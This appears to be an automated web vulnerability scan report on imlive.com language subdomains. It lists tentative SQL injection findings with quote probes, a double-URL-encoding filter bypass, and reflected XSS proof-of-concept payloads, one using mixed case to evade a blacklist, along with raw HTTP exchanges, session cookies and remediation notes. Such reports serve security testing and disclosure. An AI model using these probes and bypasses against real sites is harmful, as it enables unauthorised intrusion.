<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.2. http://de.imlive.com/waccess/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess'/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSTRTBSD=DEBIMIMACEBMBLPLGCGPGBPD; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 8237
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.3. http://es.imlive.com/waccess/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:22 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSRTQCRC=BGLJMIMACIIMCJCMFKACJEGI; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 8230
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.4. http://fr.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fr.imlive.com
Path:   /waccess/

Issue detail

The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/' HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/'' HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQRCSC=CMMFJIMAHFOLCAODNFPHKCBL; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 8249
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.5. http://gr.imlive.com/waccess/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:34 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:34 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQRQRCTC=ABOPGJMANIICBDDCLAFKMEHJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:35 GMT
Connection: close
Content-Length: 8333
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.6. http://it.imlive.com/waccess/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://it.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:08 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQSRBSD=MDONOIMAHFCJJOAEABNJMFBH; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:08 GMT
Connection: close
Content-Length: 8441
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.7. http://nl.imlive.com/waccess/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://nl.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:27 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTQDQC=DLPLFJMAFKGAEJJBLHMDPHAI; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:28 GMT
Connection: close
Content-Length: 8441
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.8. http://tr.imlive.com/waccess/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tr.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:47 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTRBSD=FAKPGKMALJJINONJKHHPMGGB; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:47 GMT
Connection: close
Content-Length: 8333
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.9. http://tr.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tr.imlive.com
Path:   /waccess/

Issue detail

The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:31:40 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527%2527 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:31:40 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTRBSD=ABKPGKMAHOCFOJMDCOENFMKF; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:31:40 GMT
Connection: close
Content-Length: 8250
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 271 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47=1 HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fqzehq45mvboz255wmce5e45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fqzehq45mvboz255wmce5e45; path=/; HttpOnly
Set-Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:44 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:43 GMT
Connection: close
Content-Length: 19557
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||94ad3"><script>alert(1)</script>4f479a42c47~1');return false;">
...[SNIP]...

2.2. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26eb"><script>alert(1)</script>f467ed2684e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b26eb"><script>alert(1)</script>f467ed2684e=1 HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:27 GMT
Connection: close
Content-Length: 21363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?b26eb"><script>alert(1)</script>f467ed2684e=1');return false;">
...[SNIP]...

2.3. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3ce'-alert(1)-'6c601d061a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?5b3ce'-alert(1)-'6c601d061a=1 HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=vc4twg45dvbaxrjcyazsha21; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=vc4twg45dvbaxrjcyazsha21; path=/; HttpOnly
Set-Cookie: spvdr=vd=403fb166-4a3b-49a4-b9e2-7da3ff9f4dd9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:45 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:45 GMT
Connection: close
Content-Length: 19131
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ar.imlive.com&ul=/?5b3ce'-alert(1)-'6c601d061a=1&qs=5b3ce'-alert(1)-'6c601d061a=1&qs=5b3ce'-alert(1)-'6c601d061a=1&iy=dallas&id=44&iu=1&vd=403fb166-4a3b-49a4-b9e2-7da3ff9f4dd9';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEv
...[SNIP]...

2.4. http://ar.imlive.com/waccess/ [cbname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f889"><script>alert(1)</script>305652e0e15 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=5f889"><script>alert(1)</script>305652e0e15&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
